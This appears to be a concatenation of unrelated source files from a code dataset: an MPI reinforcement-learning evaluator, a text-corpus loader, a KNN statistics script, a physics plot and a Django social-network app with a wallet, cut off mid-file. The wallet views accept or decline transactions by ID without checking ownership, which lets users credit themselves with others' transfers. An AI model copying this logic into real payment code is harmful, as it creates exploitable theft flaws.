python\nimport numpy as np\nimport sys, time,traceback\nimport argparse\nfrom pathlib import Path\nsys.path.append(str(Path(__file__).absolute().parent.parent.parent))\nfrom mpi4py import MPI\nimport time\n\nfrom shiva.helpers.utils.Tags import Tags\nfrom shiva.envs.Environment import Environment\nfrom shiva.helpers.config_handler import load_class\nfrom shiva.helpers.misc import terminate_process\nfrom shiva.core.admin import logger\n\n\nclass MPIEvalEnv(Environment):\n\n def __init__(self):\n self.eval = MPI.Comm.Get_parent()\n self.id = self.eval.Get_rank()\n self.info = MPI.Status()\n self.launch()\n\n def launch(self):\n \"\"\" Launches environments, creates buffers, tells MPIEvaluation it started.\n\n Return:\n None\n \"\"\"\n # Receive Config from MPI Evaluation Object\n self.configs = self.eval.bcast(None, root=0)\n super(MPIEvalEnv, self).__init__(self.configs)\n self._launch_env()\n self.eval.gather(self._get_env_specs(), root=0)\n\n '''Set function to be run'''\n if 'Gym' in self.type or 'Unity' in self.type or 'ParticleEnv' in self.type:\n self.send_evaluations = self._send_eval_roles\n elif 'RoboCup' in self.type:\n self.send_evaluations = self._send_eval_robocup\n\n self.create_buffers()\n\n start_flag = self.eval.bcast(None, root=0)\n self.log(\"Start collecting..\", verbose_level=1)\n self.run()\n\n def run(self):\n \"\"\" Starts environments and collects trajectories.\n\n Returns:\n None\n \"\"\"\n self.env.reset()\n\n while True:\n while self.env.start_env():\n self._step_python()\n # self._step_numpy()\n if self.env.is_done(n_episodes=self.configs['Evaluation']['eval_episodes']):\n self.send_evaluations()\n self.env.reset(force=False)\n\n # if self.eval.Iprobe(source=MPI.ANY_SOURCE, tag=Tags.clear_buffers, status=self.info):\n # _ = self.eval.recv(None, source=self.info.Get_source(), tag=Tags.clear_buffers)\n # self.reset_buffers()\n # print('Buffers resets')\n # self.close()\n\n def _step_python(self):\n self.observations = self.env.get_observations()\n self.eval.gather(self.observations, root=0)\n self.actions = self.eval.scatter(None, root=0)\n self.next_observations, self.rewards, self.dones, _ = self.env.step(self.actions)\n self.log(\"Acs {} Obs {}\".format(self.actions, self.observations), verbose_level=3)\n\n def _step_numpy(self):\n self.observations = self.env.get_observations()\n send_obs_buffer = np.array(self.observations, dtype=np.float64)\n self.eval.Gather([send_obs_buffer, MPI.DOUBLE], None, root=0)\n\n if 'Gym' in self.type or 'Unity' in self.type or 'ParticleEnv' in self.type:\n self.actions = self.eval.scatter(None, root=0)\n self.next_observations, self.rewards, _, _ = self.env.step(self.actions.tolist())\n # elif 'Gym' in self.type:\n # self.actions = self.eval.scatter(None, root=0)\n # self.next_observations, self.rewards, self.dones, _ = self.env.step(self.actions.tolist())\n # # if self.env.done:\n # # self._send_eval(self.env.reward_per_episode, 0)\n # # self.env.reset()\n elif 'RoboCup' in self.type:\n recv_action = np.zeros((self.env.num_agents, self.env.action_space['acs_space']), dtype=np.float64)\n self.eval.Scatter(None, [recv_action, MPI.DOUBLE], root=0)\n self.actions = recv_action\n self.next_observations, self.rewards, self.dones, _, self.metrics = self.env.step(self.actions, evaluate=True)\n # if self.dones:\n # self._send_eval(self.metrics, 0)\n # self.env.reset()\n self.log(\"Obs {} Act {}\".format(self.observations, self.actions), verbose_level=3)\n\n '''\n Roles Methods\n '''\n\n def _send_eval_roles(self):\n if 'UnityWrapperEnv1' in self.type:\n # Need to calculate the mean reward for all the simulations within the one Unity environment\n # g.i. 3DBall has 16 simulations within one Unity Environment, so we take the average across 16 agents\n reward_per_episode = {}\n for role in self.env.roles:\n reward_per_episode[role] = []\n for role_agent_id in self.env.trajectory_ready_agent_ids[role]:\n while len(self.env._ready_trajectories[role][role_agent_id]) > 0:\n _, _, _, _, _, agent_metric = self.env._ready_trajectories[role][role_agent_id].pop()\n # self.log(f\"Agent_metric {role} {role_agent_id} {agent_metric}\")\n for metric_name, value in agent_metric:\n if metric_name == 'Reward/Per_Episode':\n reward_per_episode[role].append(value)\n reward_per_episode[role] = sum(reward_per_episode[role]) / len(reward_per_episode[role])\n metric = {\n 'reward_per_episode': reward_per_episode\n }\n else:\n metric = {\n 'reward_per_episode': self.env.get_reward_episode(roles=True) # dict() that maps role_name->reward\n }\n self.eval.send(metric, dest=0, tag=Tags.trajectory_eval)\n self.log(\"Sent metrics {}\".format(metric), verbose_level=2)\n\n '''\n Single Agent Methods\n '''\n\n def _send_eval_robocup(self):\n self._send_eval(self.metrics, 0)\n\n def _send_eval_gym(self):\n self._send_eval(self.env.reward_per_episode, 0)\n\n def _send_eval(self, episode_reward, agent_idx):\n self.eval.send(agent_idx, dest=0, tag=Tags.trajectory_eval)\n self.eval.send(episode_reward, dest=0, tag=Tags.trajectory_eval)\n self.log('Eval Reward: {}'.format(episode_reward), verbose_level=2)\n\n def create_buffers(self):\n \"\"\" Creates numpy buffers to store episodic rewards\n\n Returns:\n None\n \"\"\"\n if 'Unity' in self.type or 'ParticleEnv' in self.type:\n pass\n # self.episode_rewards = np.zeros((len(self.env.roles), self.episode_max_length))\n elif 'Gym' in self.type:\n pass\n # self.episode_rewards = np.zeros(1, self.episode_max_length)\n elif 'RoboCup' in self.type:\n self.episode_rewards = np.zeros((self.num_agents, self.episode_max_length))\n self.reward_idxs = dict()\n for i in range(self.num_agents): self.reward_idxs[i] = 0\n\n def reset_buffers(self):\n \"\"\" Empties the buffers after finishing a trajectory.\n\n Returns:\n None\n \"\"\"\n if 'Unity' in self.type:\n pass\n # self.episode_rewards.fill(0)\n elif 'Gym' in self.type:\n '''Gym - has only 1 agent per environment and no groups'''\n pass\n # self.episode_rewards.fill(0)\n # self.reward_idxs = 0\n elif 'RoboCup' in self.type:\n self.episode_rewards.fill(0)\n self.reward_idxs = dict()\n # for i in range(self.num_agents): self.reward_idxs[i] = 0\n\n def _launch_env(self):\n try:\n self.configs['Environment']['port'] += 500 + np.random.randint(0, 1500)\n self.configs['Environment']['worker_id'] = 1000 * (self.id * 22)\n self.configs['Environment']['render'] = self.configs['Evaluation']['render'] if 'render' in self.configs['Evaluation'] else False\n # self.configs['Environment']['rc_log'] = 'rc_eval_log'\n # self.configs['Environment']['server_addr'] = self.eval.Get_attr(MPI.HOST)\n except:\n pass\n env_class = load_class('shiva.envs', self.configs['Environment']['type'])\n self.env = env_class(self.configs)\n if 'UnityWrapperEnv1' in self.type:\n self.env.create_buffers()\n\n def _get_env_specs(self):\n return {\n 'type': self.type,\n 'id': self.id,\n 'observation_space': self.env.get_observation_space(),\n 'action_space': self.env.get_action_space(),\n 'num_agents': self.env.num_agents,\n 'roles': self.env.roles if hasattr(self.env, 'roles') else ['Agent_0'], # agents names given by the env - needs to be implemented by RoboCup\n 'num_instances_per_env': self.env.num_instances_per_env if hasattr(self.env, 'num_instances_per_env') else 1, # Unity case\n 'learners_port': self.learners_port if hasattr(self, 'learners_port') else False\n }\n\n def close(self):\n \"\"\" Closes the connection with MPIEvaluation\n\n Returns:\n None\n \"\"\"\n comm = MPI.Comm.Get_parent()\n comm.Disconnect()\n\n def log(self, msg, to_print=False, verbose_level=-1):\n \"\"\"If verbose_level is not given, by default will log\n Args:\n msg: Message to be loged\n to_print: Whether to print it\n verbose_level: When to print it\n\n Returns:\n None\n \"\"\"\n if verbose_level <= self.configs['Admin']['log_verbosity']['EvalEnv']:\n text = \"{}\\t\\t\\t{}\".format(str(self), msg)\n logger.info(text, to_print or self.configs['Admin']['print_debug'])\n\n def __str__(self):\n return \"\".format(self.id)\n\n def show_comms(self):\n \"\"\" Shows what MPIEvaluation this EvalEnv is connection to.\n Returns:\n None\n \"\"\"\n self.log(\"SELF = Inter: {} / Intra: {}\".format(MPI.COMM_SELF.Is_inter(), MPI.COMM_SELF.Is_intra()))\n self.log(\"WORLD = Inter: {} / Intra: {}\".format(MPI.COMM_WORLD.Is_inter(), MPI.COMM_WORLD.Is_intra()))\n self.log(\"MENV = Inter: {} / Intra: {}\".format(MPI.Comm.Get_parent().Is_inter(), MPI.Comm.Get_parent().Is_intra()))\n\n\nif __name__ == \"__main__\":\n try:\n env = MPIEvalEnv()\n except Exception as e:\n msg = \" error: {}\".format(MPI.Comm.Get_parent().Get_rank(), traceback.format_exc())\n print(msg)\n logger.info(msg, True)\n finally:\n terminate_process()\n","sub_path":"shiva/shiva/eval_envs/MPIEvalEnv.py","file_name":"MPIEvalEnv.py","file_ext":"py","file_size_in_byte":10278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"195422078","text":"from django.conf.urls import patterns, include, url\nfrom article.views import sample_advanced_url, article, articles, language, create\n#from django.contrib import admin\n#admin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^all$', articles),\n url(r'^get/(?P\\d+)/$', article),\n url(r'^language/(?P[a-z\\-]+)/$', language),\n url(r'^advancedurl$', sample_advanced_url),\n url(r'^advancedurl$', sample_advanced_url),\n url(r'^create', create),\n\n)\n","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"439436532","text":"import codecs\nimport os\nimport re\n\nfrom collections import (\n Counter\n)\n\nfrom Tools import (\n decode,\n encode,\n strip_punct\n# splitter,\n# tokenizer\n)\n\n\nPATH_TWENTY_NEWSGROUPS = 'data/20_newsgroups/'\n# PATH_TWENTY_NEWSGROUPS = '../data/20_newsgroups/'\n\nSEPARATOR = re.compile('.{1,30}:')\n\n\n\nclass TwentyNewsgroupsCorpusWrapper:\n\n def __init__(self):\n self.root = PATH_TWENTY_NEWSGROUPS\n self.documents = []\n self.paths = []\n self.tags = []\n self.i_by_tag = dict([])\n self.tagdist = Counter()\n self.__load()\n\n \n def __load(self):\n for category in os.listdir(self.root):\n category_folder = '%s%s' % (self.root, category)\n if not os.path.isdir(category_folder):\n continue\n for document_path in os.listdir(category_folder):\n document_path = '%s/%s' % (category_folder, document_path)\n text = self.__read(document_path)\n\n try:\n codecs.utf_8_decode(text)\n except Exception:\n continue\n\n# print text[:1500]\n# print category\n# print\n if not text:\n continue\n self.i_by_tag[document_path] = len(self.paths)\n self.paths.append(document_path)\n self.tags.append(category)\n self.documents.append(text)\n self.tagdist[category] += 1\n \n \n def __read(self, document_path):\n with open(document_path, 'rb') as rd:\n lines = []\n for line in rd:\n try:\n line = encode(line)\n if SEPARATOR.match(line) or line.startswith('In article <') or \\\n line.startswith('>In article <'):\n continue\n lines.append(line)\n except Exception:\n pass\n return ''.join(lines)\n\n\n def fileids(self):\n for path in self.paths:\n yield path\n \n\n def words(self, path=None):\n\n if path == None:\n space = self.i_by_tag.values()\n else:\n space = [self.i_by_tag[path]]\n\n _words = []\n for i in space:\n text = self.documents[i]\n for w in text.split():\n token = strip_punct(w).lower()\n if token:\n _words.append(token)\n\n return _words\n\n\n def categories(self, path=None):\n\n if path == None:\n space = self.i_by_tag.values()\n else:\n space = [self.i_by_tag[path]]\n\n categories = [] \n for i in space:\n categories.append(self.tags[i])\n\n return categories\n","sub_path":"lib/TwentyNewsgroupsCorpusWrapper.py","file_name":"TwentyNewsgroupsCorpusWrapper.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"87676502","text":"\nfrom sklearn import svm\nimport time\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import StandardScaler, MaxAbsScaler, PowerTransformer\n\ntime_1 = time.time()\n\nprint('Prepare datasets...')\n\nlabels = []\nfeatures = []\npatients = []\nfor filename in os.listdir(\"input2/all/\"):\n raw_data = pd.read_csv(\"input2/all/\" + filename, header=0)\n f = raw_data[\"variance\"]\n features.append(f)\n x = filename.split(\"_\")[-1]\n x = x.split(\".\")[0]\n labels.append(x)\n x = filename.split(\"_\")[0]\n patients.append(x)\n\n\nfeatures2 = []\npatients2=[]\nfor filename in os.listdir(\"pure_input/all/\"):\n raw_data = pd.read_csv(\"pure_input/all/\" + filename, header=0,sep=\" \")\n f = raw_data.mean()\n features2.append(f)\n x = filename.split(\"_\")[0]\n patients2.append(x)\n\n\nfeatures2 = pd.DataFrame(features2)\nfeatures = pd.DataFrame(features)\n\nfrom sklearn.model_selection import LeaveOneOut\nloo = LeaveOneOut()\n\nm=[]\n\n\nlabels = np.array(labels)\nfor train_index, test_index in loo.split(features):\n X_train, X_test = features.iloc[train_index,:], features.iloc[test_index,:]\n X_train2, X_test2 = features2.iloc[train_index,:], features2.iloc[test_index,:]\n y_train, y_test = labels[train_index], labels[test_index]\n\n\n pca = PCA(n_components=2, whiten=True)\n pca.fit(X_train)\n X_train = pca.transform(X_train)\n X_test = pca.transform(X_test)\n\n pca = PCA(n_components=2, whiten=True)\n pca.fit(X_train2)\n X_train2 = pca.transform(X_train2)\n X_test2 = pca.transform(X_test2)\n\n\n\n clf = KNeighborsClassifier(n_neighbors=3)\n clf.fit(X_train, y_train)\n\n clf2 = KNeighborsClassifier(n_neighbors=3)\n clf2.fit(X_train2, y_train)\n\n test_predict = clf.predict(X_test)\n test_predict2 = clf2.predict(X_test2)\n\n\n e1=0\n if(test_predict!=y_test):\n #print(\"real value : \"+str(y_test)+\" , predicted : \"+str(test_predict))\n e1=1\n\n e2=0\n if(test_predict2!=y_test):\n #print(\"real value : \"+str(y_test)+\" , predicted : \"+str(test_predict))\n e2=1\n\n\n print(e1)\n print(e2)\n e=e1-e2\n print(e)\n m.append(e)\n\n\nprint(m)\ns = np.std(m)\ns = s/np.sqrt(len(m)-1)\n\na = np.mean(m)\n\n# t statistic\nt = a/s\n\nprint(t)\n\n\n### output : 0.9999999999999999\n\n\n","sub_path":"SVCA_Analysis/fisrst_vs_second.py","file_name":"fisrst_vs_second.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"194143310","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nSMALL_SIZE = 30\nMEDIUM_SIZE = 40\nBIGGER_SIZE = 50\n\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\npi = np.pi\n\nTemp = (1e3/(1.16e4) *1e-9) # Neutron star temperature in GeV\nneutron_mass = (0.939) # mass of neutron in GeV\ntherm_time = (1e10 *3.154e7 /(6.58e-16) * 1e9)# in GeV^-1\n\ndef coupling_squared_bert(DM_mass):\n k_n = np.sqrt(4*DM_mass*Temp)\n k_0 = DM_mass/3\n\n bracket = (1/(k_n)**4 - 1/(k_0)**4)\n numerator = 105 * pi**3 * DM_mass * bracket\n denominator = 4 * neutron_mass**2 * therm_time\n\n return numerator/denominator\n\n\ndef cross_section_bert(DM_mass):\n\n numerator = coupling_squared_bert(DM_mass) * neutron_mass**2 * DM_mass**2\n denominator = pi *(neutron_mass + DM_mass)**2\n cross_section_GeV2 = numerator/denominator\n\n return cross_section_GeV2 * (1/(1.97e7) *1e-9)**2 * 1e4\n\n\ndef make_plot_cross_section():\n mass_range = np.logspace(-6, 6, num = 1000)\n cross_section_array_bert = np.empty(0)\n\n for mass in mass_range:\n dummy_bert = cross_section_bert(mass)\n cross_section_array_bert = np.append(cross_section_array_bert, dummy_bert)\n\n fig, ax1 = plt.subplots(figsize = (20, 11), dpi = 500)\n ax1.loglog(mass_range, cross_section_array_bert, color='navy')\n ax1.axis([1e-6, 1e6, 1e-59, 1e-53])\n ax1.set(xlabel = r'$m_\\chi$ [GeV]', ylabel = r'$\\sigma$ [cm$^2$]')\n ax1.grid(linestyle='--')\n ax1.fill_between(mass_range, cross_section_array_bert, facecolor='cornflowerblue')\n ax1.text(1e-2, 4e-57, 'No thermalization', fontsize=40)\n\n plt.savefig('bert_cs.png')\n\n\nmake_plot_cross_section()\n","sub_path":"Bertoni Code/bertoni_analytic.py","file_name":"bertoni_analytic.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"471284877","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate\nfrom dashboard.forms import EditProfileForm\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.db.models import Q\nfrom account.models import Account\nfrom dashboard.models import Friend, Wallet, Transaction, feed, Message, Page\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import ListView, CreateView\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\n# from dashboard.models import Friends\n\ndef dashboard_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\n\tp = Page.objects.all()\n\tprint(p)\n\targs = {\n\t\t\"text\" : \"This is the dashboard\",\n\t\t'pages' : p\n\t}\n\n\taccounts = Account.objects.all()\n\targs['accounts'] = accounts \n\n\tif request.user.is_authenticated:\n\t\treturn render(request, 'dashboard.html', args)\n\telse : return redirect('login')\n\ndef profile_view(request, u_id=None):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_data = Account.objects.filter(id=u_id)[0]\n\n\tposts = feed.objects.filter(post_to = user_data).order_by('-date_posted')\n\n\tis_friend = False\n\n\tif int(u_id) == int(request.user.id):\n\t\tis_friend = True\n\n\tif Friend.objects.filter(user_1 = user_data, user_2 = request.user).exists() | Friend.objects.filter(user_2 = user_data, user_1 = request.user).exists():\n\t\tis_friend = True\n\tprint(is_friend)\n\n\targs = {\n\t\t'user': user_data,\n\t\t'u_id' : int(u_id),\n\t\t'posts' : posts,\n\t\t'is_friend' : is_friend\n\t}\n\treturn render(request, 'profile.html', args)\n\ndef edit_profile_info_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {}\n\n\tif request.method == \"POST\":\n\t\tform = EditProfileForm(request.POST, instance=request.user)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/profile/'+str(request.user.id)+'/')\n\t\n\telse:\n\t\tform = EditProfileForm(instance=request.user)\n\t\targs = {'edit_profile_info_form': form}\n\t\treturn render(request, 'edit_profile_info.html', args)\n\ndef change_password_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {}\n\n\tif request.method == \"POST\":\n\t\tform = PasswordChangeForm(data=request.POST, user=request.user)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tupdate_session_auth_hash(request, form.user)\n\t\t\treturn redirect('/profile/'+str(request.user.id)+'/')\n\t\telse: return redirect('change_password')\n\telse: \n\t\tform = PasswordChangeForm(user=request.user)\n\t\targs = {'change_password_form': form}\n\t\treturn render(request, 'change_password.html', args)\n\n\ndef search_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\t\n\tsearch_content = request.GET.get('q')\n\t# print(request.user.id)\n\n\n\tif search_content:\n\t\tresults = Account.objects.filter(\n\t\t\tQ(username__icontains=search_content)\n\t\t\t| Q (email__icontains=search_content)\n\t\t\t| Q (first_name=search_content)\n\t\t\t)\n\t\tresults = results.exclude(id=request.user.id)\n\n\n\t\tif results:\n\t\t\targs = {\n\t\t\t\t'result' : results,\n\t\t\t\t'status' : 200,\n\t\t\t\t'error' : '' \n\t\t\t}\n\t\t\treturn render(request, 'search.html', args)\n\t\telse:\n\t\t\targs = {\n\t\t\t\t'result' : '',\n\t\t\t\t'status' : 0,\n\t\t\t\t'error' : {\n\t\t\t\t\t1 : 'No results found'\n\t\t\t\t}\n\n\t\t\t}\n\t\t\treturn render(request, 'search.html', args)\n\treturn render(request, 'search.html')\n\n\ndef friends_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = request.user\n\tfriends = (Friend.objects.filter(user_1 = user_1) | Friend.objects.filter(user_2 = user_1) ) & Friend.objects.filter(status = True)\n\n\targs = {\n\t\t'friends' : friends,\n\t\t'status' : 200,\n\t\t'errors' : ''\n\t}\n\n\treturn render(request, 'friends.html', args)\n\ndef friend_requests_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = request.user\n\tfriend_requests = Friend.objects.filter(user_2 = user_1) & Friend.objects.filter(status = False)\n\n\targs = {\n\n\t\t'friend_requests' : friend_requests,\n\t\t'status' : 200,\n\t\t'errors' : ''\n\t}\n\n\treturn render(request, 'friend_request.html', args)\n\ndef send_request_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {\n\n\t}\n\tuser_1 = request.user\n\tuser_2 = Account.objects.filter(id=u_id)[0]\n\n\tif Friend.objects.filter(user_1 = user_1, user_2 = user_2).exists() | Friend.objects.filter(user_1 = user_2, user_2 = user_1).exists():\n\t\treturn redirect('friends')\n\telse : \n\t\tfriend_request = Friend(user_1 = user_1, user_2 = user_2, status = False)\n\t\tfriend_request.save()\n\n\treturn redirect('friends')\n\t\ndef accept_request_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_2 = request.user\n\tuser_1 = Account.objects.filter(id=u_id)[0]\n\n\taccept_request = Friend.objects.get(user_1 = user_1, user_2 = user_2, status = False)\n\taccept_request.status = True\n\taccept_request.save()\t\n\treturn redirect('friends')\n\ndef delete_request_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = Account.objects.filter(id=u_id)[0]\n\tuser_2 = request.user\n\n\tif Friend.objects.filter(user_1 = user_1, user_2 = user_2).exists():\n\t\tFriend.objects.filter(user_1 = user_1, user_2 = user_2).delete()\n\n\tif Friend.objects.filter(user_1 = user_2, user_2 = user_1).exists():\n\t\tFriend.objects.filter(user_1 = user_2, user_2 = user_1).delete()\n\t# delete_request.save()\n\n\treturn redirect('friend_requests')\n\ndef unfriend_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = request.user\n\tuser_2 = Account.objects.filter(id=u_id)[0]\n\tprint(user_1)\n\tprint(user_2)\n\tprint(\"inside here ----------\")\n\t# remove_friend_2 = Friend.objects.filter(user_1 = user_2, user_2 = user_1)[0] | Friend.objects.filter(user_1 = user_1, user_2 = user_2)[0] \n\n\tif Friend.objects.filter(user_1 = user_2, user_2 = user_1).exists():\n\t\tFriend.objects.filter(user_1 = user_2, user_2 = user_1)[0].delete()\n\t\n\n\tif Friend.objects.filter(user_1 = user_1, user_2 = user_2).exists():\n\t\tFriend.objects.filter(user_1 = user_1, user_2 = user_2)[0].delete()\n\n\n\treturn redirect('friends')\n\n\ndef wallet_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\t# print(Wallet.objects.filter(user = request.user))\n\tbalance = Wallet.objects.filter(user = request.user)[0].balance\n\ttransactions = Transaction.objects.filter(user_1 = request.user, status = True) | Transaction.objects.filter(user_2 = request.user, status = True)\n\n\ttransactions_count = len(transactions)\n\targs = {\n\t\t'balance' : balance,\n\t\t'transactions' : transactions,\n\t\t'transactions_count' : transactions_count\n\n\t}\n\treturn render(request, 'wallet.html', args)\n\n\ndef transactions_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransactions = Transaction.objects.filter(user_1 = request.user, status = True) | Transaction.objects.filter(user_2 = request.user, status = True)\n\n\ttransactions_count = len(transactions)\n\targs = {\n\t\t# 'balance' : balance,\n\t\t'transactions' : transactions,\n\t\t'transactions_count' : transactions_count\n\t}\n\treturn render(request, 'transactions.html', args)\n\ndef add_money_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {\n\t\n\t}\n\n\tif request.method == \"POST\":\n\t\tamount = request.POST.get('amount')\n\t\t\n\t\tif(amount==''):\n\t\t\treturn redirect('wallet')\n\t\tif(len(amount)>7):\n\t\t\treturn redirect('/wallet/add_money/')\n\t\tif int(amount) > 0 :\n\t\t\twallet_instance = Wallet.objects.filter(user = request.user)[0]\n\t\t\tif(len(str(int(wallet_instance.balance)+int(amount)))>12):\n\t\t\t\treturn redirect( 'wallet' )\n\t\t\twallet_instance.balance = str(int(wallet_instance.balance) + int(amount))\n\t\t\twallet_instance.save()\n\n\t\t\treturn redirect('wallet')\n\n\treturn render(request, 'add_money.html', args)\n\n\t\ndef transfer_money_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\n\tfriends = (Friend.objects.filter(user_1 = request.user) | Friend.objects.filter(user_2 = request.user) ) & Friend.objects.filter(status = True)\n\n\tif request.method == \"POST\":\n\t\treceiver_id = request.POST.get('u_id')\n\t\tamount = request.POST.get('amount')\n\t\tif(amount==''):\n\t\t\treturn redirect('wallet')\n\t\tif(len(amount)>7):\n\t\t\treturn redirect('/wallet/transfer_money/')\n\t\tif(int(amount)<0):\n\t\t\treturn redirect('/wallet/transfer_money/')\n\t\taccount_balance = Wallet.objects.filter(user = request.user)[0]\n\n\t\ttransactions = Transaction.objects.filter(user_1 = request.user, status = True) | Transaction.objects.filter(user_2 = request.user, status = True)\n\n\t\ttransactions_count = len(transactions)\n\n\t\tif request.user.is_casual_user and not request.user.is_premium_user and not request.user.is_commercial_user and transactions_count>15:\n\t\t\treturn redirect('wallet')\n\n\t\tif request.user.is_premium_user and not request.user.is_commercial_user and transactions_count>30:\n\t\t\treturn redirect('wallet')\n\n\n\t\tif int(account_balance.balance) - int(amount) >= 0 : \n\n\t\t\taccount_balance.balance = int(account_balance.balance) - int(amount)\n\t\t\taccount_balance.save()\n\n\t\t\tuser_2 = Account.objects.filter(id = receiver_id)[0]\n\t\t\tt = Transaction(user_1 = request.user, user_2 = user_2, status = False, payment_method = 'paytm', amount = amount)\n\t\t\t\n\t\t\tt.save()\n\t\n\t\treturn redirect('wallet')\n\n\n\targs = {\n\t\t'friends' : friends\n\t}\n\treturn render(request, 'transfer_money.html', args)\n\ndef accept_decline_transaction_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransaction_requests = Transaction.objects.filter(user_2 = request.user, status = False)\n\n\ttransaction_requests_count = len(transaction_requests)\n\n\targs = {\n\t\t# 'balance' : balance,\n\t\t'transactions' : transaction_requests,\n\t\t'transactions_count' : transaction_requests_count\n\t}\n\n\treturn render(request, 'accept_decline.html', args)\n\ndef accept_transaction_view(request, t_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransaction = Transaction.objects.filter(id = t_id)[0]\n\tprint(transaction.user_1)\n\tuser_wallet = Wallet.objects.filter(user = request.user)[0]\n\tprint(user_wallet)\n\tsender_wallet = Wallet.objects.filter(user = transaction.user_1)[0]\n\tprint(sender_wallet.balance)\n\ttransaction_amount = transaction.amount\n\n\tuser_wallet.balance = user_wallet.balance + transaction_amount\n\t\n\tuser_wallet.save()\n\n\ttransaction.status = True\n\ttransaction.save()\n\n\treturn redirect('accept_decline')\n\ndef decline_transaction_view(request, t_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransaction = Transaction.objects.filter(id = t_id)[0]\n\tsender_wallet = Wallet.objects.filter(user = transaction.user_1)[0]\n\tsender_wallet.balance = int(sender_wallet.balance) + int(transaction.amount)\n\tsender_wallet.save()\n\ttransaction.delete()\n\n\treturn redirect('accept_decline')\n\n\n\ndef create_group_view(request):\n\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {\n\t\n\t}\t\n\treturn render(request, 'messenger.html', args)\n\ndef create_post_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\t\n\targs = {\n\t\t'u_id' : u_id\n\t}\n\n\tif request.method == \"POST\":\n\t\tcontent = request.POST.get('post_content')\n\t\tpost_to = Account.objects.filter(id = u_id)[0]\n\t\tauthor = request.user\n\t\tprint(content)\n\t\tprint(post_to)\n\t\tprint(author)\n\t\tf = feed(content = content, post_to = post_to, author = author)\n\t\tf.save()\n\n\t\treturn redirect('/profile/'+str(u_id))\n\n\n\treturn render(request, 'create_post.html', args)\n\ndef upgrade_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tif request.user.is_commercial_user:\n\t\tuser_type = 2\n\telif request.user.is_premium_user:\n\t\tuser_type = 1\n\telse: user_type = 0\n\n\n\targs = {\n\t\t'user_type' : user_type,\n\t}\n\n\treturn render(request, 'upgrade.html', args)\n\n\ndef upgrade_payment_view(request, type):\n\n\targs = {\n\t\t'type' : int(type)\n\t}\n\n\t# if int(type) == 1:\n\t\t# args['payment']['2_groups'] = 50\n\t\t# args['payment']['4_groups'] = 100\n\t\t# args['payment']['any_groups'] = 150\n\t\t \n\tif int(type) == 2:\n\t\tif request.user.is_verified:\n\t\t\targs['payment_amount'] = 5000 \n\n\n\tif request.method == \"POST\":\n\t\tprint(\"inside\")\n\n\t\taccount = Account.objects.filter(id = request.user.id)[0]\n\t\tif(request.POST.get('amount')):\n\t\t\tamount = request.POST.get('amount')\n\t\t\twallet = Wallet.objects.filter(user = request.user)[0]\n\t\t\tif(wallet.balance - int(amount) >=0):\n\t\t\t\twallet.balance = int(wallet.balance) - int(amount)\n\t\t\t\twallet.save()\n\t\t\t\n\t\t\t\taccount.is_premium_user = True\n\t\t\t\tif int(amount) == 50:\n\t\t\t\t\taccount.premium_type = 1\n\t\t\t\tif int(amount) == 100:\n\t\t\t\t\taccount.premium_type = 2\n\t\t\t\tif 